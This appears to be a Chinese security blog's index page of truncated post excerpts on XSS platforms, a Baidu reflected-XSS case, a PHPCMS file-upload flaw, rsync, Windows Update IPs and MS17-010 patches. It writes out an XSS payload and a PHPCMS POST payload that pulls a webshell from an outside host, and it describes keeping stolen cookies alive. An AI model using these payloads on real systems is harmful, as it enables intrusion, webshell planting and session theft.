后台(内网)打穿神器→xss蠕虫

后台(内网)打穿神器→xss蠕虫
首先要说一下,有这个插件是因为看了一篇文章,然后根据文章提供的dom稍作修改。 文章地址:延长 XSS 生命期 作者:EtherDream   有兴趣的朋友可以看看。本插件至少在chrome浏览器已经测试成功完全没问题。其他浏览器未测。 插件使用方法及注意事项: 首先使用这个插件必须要有一个使用【默认模块】的一个项目,注意这个项目只能使用【默认模块】不要使用其它模块配合。 此...

百度搜索框反射XSS分析 (2015年案例)

百度搜索框反射XSS分析 (2015年案例)
最近迷恋上了反射XSS,搜集各种相关知识,案例。最近发现一个2015年某大神找到的百度搜索框的反射XSS,看完之后觉得还是很有学习的意义的。 【案例一:百度搜索框反射XSS分析】 首先上图加完整payload如下: 百度搜索框反射XSS http://www.baidu.com/s?wd=site:<script/xx>/**/alert(/XSSPAYLOAD/)// 不过还好,有曾经这个网页的快照来分析代码,所以废话不多说,直接...

swf\flash反编译工具 JPEXS Free Flash Decompiler

swf\flash反编译工具 JPEXS Free Flash Decompiler
很多人网上找到的swf\flash反编译工具不是被捆木马,就是病毒文件,巨坑,还有什么需要注册码,还有什么全是广告也无法下载,这里本人推荐一款软件swf\flash反编译工具,免费且真的好用,本人亲测。如图: JPEXS Free Flash Decompiler工具截图 下载地址:http://pan.baidu.com/s/1gf5SWin  密码:amme 官方网站:https://www.free-decompiler.com/flash/ 当然了它也需要你...

Windows 2008中配置Rsync同步Linux文件

Windows 2008中配置Rsync同步Linux文件
因为需要对某些源代码检查的需要,这里需要把Linux服务器中的源码同步到本地,因为服务器中的设置我并不知道,而运维的人只给了一个linux的 rsyncd.conf配置文件,就让我同步,无奈自己的服务器是windows的。 研究了好一会。 最终实现的命令是: rsync -avz root@10.10.94.38::xxxxxx /cygdrive/d/wenjianjia/   --port=28950 # 端口 -vzrtopg --progress # 显示同步过...

windows update 更新IP地址集合(windows 更新IP段 合集 收集)

windows update 更新IP地址集合(windows 更新IP段 合集 收集)
因为某些情况下,公司需要禁用这些IP段,晚上花了近4个小时通过各种方法找到了下面的这些数据,虽然不敢说全,但是尽力了。真真的,你看看这篇文字发布的时间也许你就懂了。当然,如果我会反编译windows程序也许会更轻松。好了,不说废话了,直接给出IP地址。 ------------------------------------------------------------------ 65.55.50.189 65.55.50.158 65.55.50.157 ...

MS17-010防范方法 最新勒索病毒(Wannacry蠕虫)防范方法 (445端口关闭方法)

MS17-010防范方法 最新勒索病毒(Wannacry蠕虫)防范方法 (445端口关闭方法)
其实关闭这个端口,关闭那个端口的很费劲,而且有的时候还关闭不了,最重要的是你瞎设置万一出错了呢??? 说来说去何必那么费劲!?!?直接打补丁不就完事了么。   WIN7   32(x86)位操作系统补丁地址: http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu  ...

xss平台持久cookie说明 keepsession说明

xss平台持久cookie说明 keepsession说明
keepsession功能说明 首先简单说明一下【XSS利用之延长Session生命周期】,说白了就是携带你X到的cookie访问对应的URL地址,一般情况下,如果你X到了对方的cookie,时间长不访问(默认21分钟)后,这个cookie就会失效,你就无法使用这个cookie。那么只要你携带着这个X到的cookie,几分钟访问一次,几分钟访问一次,这样cookie就不会失效(当然,如果程序做了特殊验证,那么就没...

PHPCMS最新版任意文件上传漏洞 及 修复方法

PHPCMS最新版任意文件上传漏洞 及 修复方法
注意这个漏洞不知道是哪位朋友爆出来的,找不到来路。。我只是给了修复建议。 首先打开注册页面,然后向注册页面POST如下payload: siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol= 然后就会报错并返回shell地址...

php 多线程之 function() use() {}

php 多线程之 function() use() {}
因为最近在写弄一个多线程采集的东东,用到了一个多线程采集的插件,但是因为这个多线程采集的时候是闭包的,直接会给采集结果,这个采集结果没办法实际利用。所以嘞。最终百度了一下,发现function() use() {} 可以很好的解决这个问题。看下面的代码。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 getDatacontent(function($...

xss获取后台二级密码 – URL跳转 (地址栏不变)

xss获取后台二级密码 – URL跳转 (地址栏不变)
下面这段话来自土司地址:https://www.t00ls.net/thread-39293-1-1.html  -------【现在很多后台有二级密码,也就是说,你x进去后,还是要输入一个密码才能搞定。但鉴浏览器没有记录这个二级密码,所以不能通过xss来读取。 键盘记录的代码只能获取当前页面的表单来记录,然后提交到x平台。而二级密码这个页面又不能插入xss代码,所以不能通过这个键盘记录来获取二级密码。所...